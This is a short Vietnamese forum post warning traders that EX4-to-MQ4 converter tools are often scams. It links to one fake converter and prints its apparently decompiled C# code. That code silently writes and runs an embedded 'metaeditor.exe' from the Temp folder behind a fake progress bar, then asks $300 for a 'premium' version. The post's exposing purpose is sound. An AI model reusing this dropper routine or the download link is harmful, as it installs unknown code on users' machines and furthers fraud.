Bác nào định mua thì tìm hiểu kỹ nhé hoặc teamviewer chạy thử.
Nhiều khi nó fake lùa gà thôi. Dưới đây là 1 bản fake.
http://www.mediafire.com/file/z6ibuyb3z6sdv84/Ex4+to+Mq4+Converter+2016.zip
Fake.
// WindowsApplication1.Form1
private void Timer1_Tick(object sender, EventArgs e)
{
this.ProgressBar1.Increment(1);
bool flag = this.ProgressBar1.Value == 49;
if (flag)
{
File.WriteAllBytes(MyProject.Computer.FileSystem.S pecialDirectories.Temp + "\\metaeditor.exe", Resources.metaeditor);
Process.Start(MyProject.Computer.FileSystem.Specia lDirectories.Temp + "\\metaeditor.exe");
}
flag = (this.ProgressBar1.Value == 9);
if (flag)
{
this.NotifyIcon1.Icon = SystemIcons.Information;
this.NotifyIcon1.BalloonTipTitle = "Ex4 to Mq4 Converter Universal 2016";
this.NotifyIcon1.BalloonTipText = "Normal Conversion Process Started";
this.NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info;
this.NotifyIcon1.Visible = true;
this.NotifyIcon1.ShowBalloonTip(30000);
}
flag = (this.ProgressBar1.Value == this.ProgressBar1.Maximum);
if (flag)
{
this.ProgressBar1.Value = this.ProgressBar1.Minimum;
this.Timer1.Stop();
}
flag = (this.ProgressBar1.Value == 48);
if (flag)
{
Interaction.MsgBox("Buy Premium Version @300$ & convert any ex4 file contact ====", MsgBoxStyle.Exclamation, "Contact Info");
this.Timer1.Stop();
}
}